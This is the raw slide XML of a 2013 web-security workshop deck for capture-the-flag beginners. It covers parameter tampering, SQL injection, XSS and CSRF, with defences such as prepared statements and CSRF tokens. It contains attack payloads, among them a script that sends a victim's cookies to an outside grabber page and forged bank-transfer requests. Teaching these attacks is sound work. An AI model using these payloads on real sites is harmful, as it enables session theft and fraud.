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2" r:id="rId37"/>
    <p:sldId id="291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156" y="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AAAC97D-9377-45E3-9D3E-608CCDABCF23}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/4/2013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E999661-A300-4A94-B8EE-705ADE84E9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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security workshop</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TexSaw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2013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6019800"/>
            <a:ext cx="6705600" cy="71603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Presented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Joshua Hammond</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prepared by Scott  Hand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57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 Tampering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4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Very basic attack on HTTP protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploits server’s misguided trust in data from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28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Game High Scores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5545667" y="2209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39325" y="2209800"/>
            <a:ext cx="1731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Give me a game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048000" y="2895600"/>
            <a:ext cx="249766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21098" y="2895600"/>
            <a:ext cx="1151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74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Game High Scores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5545667" y="2209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Game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Local)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8400" y="3124200"/>
            <a:ext cx="1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96635" y="3124200"/>
            <a:ext cx="0" cy="1684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3886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8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Game High Scores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5545667" y="2209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Game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Local)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96635" y="2667000"/>
            <a:ext cx="470777" cy="2142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3886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9000" y="2895600"/>
            <a:ext cx="21166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1098" y="2895600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Nice!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91168" y="2209800"/>
            <a:ext cx="1949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how I did…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7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– Game High Scores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5545667" y="2209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Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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Game</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Local)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96635" y="2667000"/>
            <a:ext cx="470777" cy="2142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3886200"/>
            <a:ext cx="696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Score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9000" y="2895600"/>
            <a:ext cx="21166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1098" y="2895600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Nice!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053515" y="2209800"/>
            <a:ext cx="25090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how I  SAY I did…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4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PayPal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5545667" y="2209800"/>
            <a:ext cx="1083733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439325" y="2209800"/>
            <a:ext cx="1739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want to buy this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048000" y="2895600"/>
            <a:ext cx="249766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36385" y="2895600"/>
            <a:ext cx="2145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Pay for it with PayPal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05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PayPal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PayPal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8400" y="3124200"/>
            <a:ext cx="1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96635" y="3124200"/>
            <a:ext cx="0" cy="1684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5909" y="3429000"/>
            <a:ext cx="17050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how much</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I owe you.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Flowchart: Magnetic Disk 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545667" y="2209800"/>
            <a:ext cx="1083733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96635" y="350520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Sounds good.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0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PayPal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PayPal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96635" y="2667000"/>
            <a:ext cx="470777" cy="2142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3886200"/>
            <a:ext cx="1866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Tell them you paid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9000" y="2895600"/>
            <a:ext cx="21166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1098" y="289560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91168" y="2209800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paid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5545667" y="2209800"/>
            <a:ext cx="1083733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0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– PayPal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PayPal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438400" y="3124200"/>
            <a:ext cx="1" cy="17526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96635" y="3124200"/>
            <a:ext cx="0" cy="16848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45909" y="3429000"/>
            <a:ext cx="1769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Here’s how much </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I say I owe you.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Flowchart: Magnetic Disk 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545667" y="2209800"/>
            <a:ext cx="1083733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96635" y="3505200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Sounds good.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31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Background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48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– PayPal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Smiley Face 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="2209800"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFac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048000" y="2667000"/>
            <a:ext cx="25146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owchart: Magnetic Disk 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074333" y="4876800"/>
            <a:ext cx="973667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PayPal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696635" y="2667000"/>
            <a:ext cx="470777" cy="214206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819400" y="3886200"/>
            <a:ext cx="18665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Tell them you paid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429000" y="2895600"/>
            <a:ext cx="211666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21098" y="2895600"/>
            <a:ext cx="843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391168" y="2209800"/>
            <a:ext cx="207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 paid what you said</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Flowchart: Magnetic Disk 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545667" y="2209800"/>
            <a:ext cx="1083733" cy="99212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Merchant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07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 and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Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>TamperData</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Live HTTP Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BurpSuite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Never trust the integrity of data that a user can edit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web services can allow servers to talk and bypass the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9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14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Injection attacks – user takes advantage of poor input sanitization to insert data into the client application that is passed (and trusted) to a server application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection – users exploits the trust that the database engine has in the web server by giving the web server data that alters a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another injection is command injection – targets system process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44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select a user:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * from users WHERE name = 'Bob';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The username is determined at runtime, so let’s make it:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * from users WHERE name = '$name';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For example, if $name is “Joe”:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * from users WHERE name = 'Joe';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34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Let’s give it a string that will change the query once substituted into it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack string is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>' or '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>'='1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When plugged into the query, the following is produced:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * from users where NAME = '' or '1'='1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This always returns a row</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271684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injection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SELECT money from users where id = $id;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We control the $id variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Utilize UNION to forge our own data:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0 UNION SELECT 1000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Resulting query:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT money from users where id = 0 UNION SELECT 1000000;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9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2531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Parameterized queries. In PHP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stupid way:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-&gt;query(“select user where id = $id”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Smart way:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-&gt;prepare(“select user where id = :id”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-&gt;execute(array(‘:id’ =&gt; $id));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is better because the DB doesn’t need to trust the web server since the actual query doesn’t change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DON’T FILTER, USE PREPARED STATEMENTS / PARAMETERIZED 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589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Internet Browser (Firefox has the nicest plugins)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python or other scripting language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BurpSuite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59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Cross Site Scripting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8333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Exploits the trust a browser places in a site by running code (usually JS) in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reflected: user is tricked into running some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In URL: site.com/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=&lt;script&gt;…&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pasted into address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored: the malicious code is stored persistently on the compromised website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unfiltered comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injections allowing user control where not intended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92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Payloads and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Steal cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open a hidden IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam advertisements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redirect to another page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click jacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many more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02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Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>jQuery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;$.get(‘www.mysite.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>grabber.php?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=‘ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A get request is made to our site, which stores the parameter c in a log file, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>autopwns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> them. Whatever.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3357483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750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Developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t allow users to post HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keep an eye out for places where attackers could modify what other peoples’ browsers render</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users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NoScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or similar whitelisting plugin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t click or paste a link with JavaScript in it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5216375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Server Request Forgery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0168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Similar to XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploits trust that servers place in browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It’s very difficult for a web server to know whether a request your computer sent it was sent with your knowledge or approval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Different than XSS, but XSS is often an attack vector for CSRF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71024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Images</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=“bank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>transfer.php?to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>me&amp;amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=1000000” /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>$.post(‘bank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>transfer.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>’, {to: ‘me’, amount: 1000000});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466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554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Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Steal data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gain access to system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bypass authentication barriers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85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Only trust requests from your domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use CSRF protection tokens – included in many web frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use the appropriate HTTP request, don’t use GET for something that modifies data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Not much to do as a user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1074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Tips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520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 at Requests!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err="1" smtClean="0"/>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Firebug, Chrome Developer Tools, Live HTTP Headers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The idea is to find things we can alter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The goal is to invalidate trust that the developer put in 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40160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Inject Everything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your data goes into a database query, try SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you think it’s piping your input into a program, try command injection via &amp;&amp; and the like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If it looks like it’s rendering HTML, try some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0769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804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CTF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Presented by Scott Hand (utdallas.edu/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shand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88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Web applications are Internet interfaces to web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example web servers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nginx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Self contained servers (often called web services)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091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Most familiar style: URL maps to file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.site.com/f1/f2/p.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The above maps to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/www/f1/f2/p.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RESTful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Routing embeds resources in URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.site.com/users/create</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The above maps to a function that creates a new user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More common for web services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Protocol that provides the way to communicate over the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is stateless and asynchronous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simulate state with sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your browser keeps session information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The server uses this to keep track of your state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: Shopping Cart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session has an ID tied to a cart in database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every page you visit has to establish your identity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97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Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GET – asks server for information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST – gives server data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PUT – tells server to modify or create data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DELETE – tells server to delete data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GET shows your profile on a webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST is used to upload your picture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
